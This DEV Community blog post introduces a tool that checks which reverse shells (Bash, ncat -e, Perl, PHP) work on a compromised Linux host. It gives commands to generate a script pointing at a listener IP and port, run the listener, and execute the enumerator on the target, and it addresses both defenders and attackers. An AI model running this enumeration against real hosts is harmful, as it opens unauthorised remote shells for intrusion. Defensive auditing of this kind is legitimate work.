DEV Community

Cover image for Reverse Shell Enumeration
fx2301
fx2301

Posted on

Reverse Shell Enumeration

#redteam #blueteam #reverseshell #enumeration

Why?

You're a defender wanting to audit to see which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.

When?

You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.

How?

  1. Clone the repo: 
git clone https://github.com/fx2301/reverseshellenum.git
cd reverseshellenum
Enter fullscreen mode Exit fullscreen mode
  1. Generate yourself a fresh script: 
LHOST="10.10.0.123" LPORT=31373 python3 generate.py
Enter fullscreen mode Exit fullscreen mode
  1. Run the listener: 
./listen.sh
Enter fullscreen mode Exit fullscreen mode
  1. Run the reverse shell enumerator on the target host: 
./reverseshellenum.sh
Enter fullscreen mode Exit fullscreen mode
  1. Observe which shells work (refer to shells.json): 
$ ./listen.sh
[i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
Enter fullscreen mode Exit fullscreen mode

PR's welcome! Kudos to revshells.com for the raw material.

Top comments (0)

Read next

catundanatalia profile image

We are simplifying (literals(arrays and objects)) in Js.

Natália Catunda -

khalid7487 profile image

Multipart from data send to backend as json file using axios.

Md. Khalid Hossen -

fabianoflorentino profile image

A interface Write

Fabiano Santos Florentino -

angelodotnet profile image

Docker configurations for relational and non-relational databases

Angelo Pirola -